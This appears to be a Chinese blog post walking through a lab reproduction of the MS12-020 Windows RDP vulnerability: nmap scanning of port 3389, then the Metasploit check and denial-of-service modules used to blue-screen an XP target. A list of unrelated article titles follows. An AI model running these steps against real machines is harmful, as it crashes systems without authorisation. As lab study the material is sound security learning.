漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)

介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

靶机:xp   192.168.45.158
攻击机:kali  192.168.45.155

1  用nmap扫描一下靶机有没有开启3389
ms12-020复现-xp蓝屏 

2. 扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。
使用 use auxiliary/scanner/rdp/ms12_020_check模块,建立目标地址

验证 run

存在这个漏洞 ,有效

3.  存在这个漏洞
直接利用蓝屏模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

查看需要设置什么参数

开始攻击 run

4. 攻击成功

最新文章

  1. 游标cursor
  2. Vue数据绑定隐藏的神坑....
  3. 总结的一些网站利于搜索引擎优化的小常识及SEO优化
  4. 边框(border)边距(margin)和间隙(padding)属性的区别
  5. mfc ui3
  6. NSDictionary初始化,使用@{}方法,插入nil时会报空指针异常
  7. 我用Cocos2d-x模拟《Love Live!学院偶像祭》的Live场景(三)
  8. php 中时间函数date及常用的时间计算
  9. 手把手教你用Vue造轮子(3):开发可排序的表格组件
  10. 安装Python的numpy库
  11. Ioc及Bean容器(三)
  12. DOM入门。
  13. css 别人找的css特效
  14. CentOS 安装、配置supervisord
  15. lua 设置文件运行的环境
  16. 泡泡一分钟:Semantic Labeling of Indoor Environments from 3D RGB Maps
  17. JavaScript高级特性-数组
  18. 洛谷P4141消失之物
  19. [转]同一个tomcat不同项目的session共享问题
  20. C# 提高必备精品--你所需要的NET笔记

热门文章

  1. PHP如何实现百万级数据导出
  2. day 57 Django基础五之django模型层之关联管理器
  3. minifilter 算是总结吧
  4. ztree 树状图——例
  5. mysql权限修改记录
  6. (转)NodeJS收发GET和POST请求
  7. opencv-识别手写数字
  8. tensorflow识别验证码(1)-tensorflow安装,验证码生成
  9. 【数位DP】[LOJ10163]Amount of Degrees
  10. openSUSE中启用apache mod_rewrite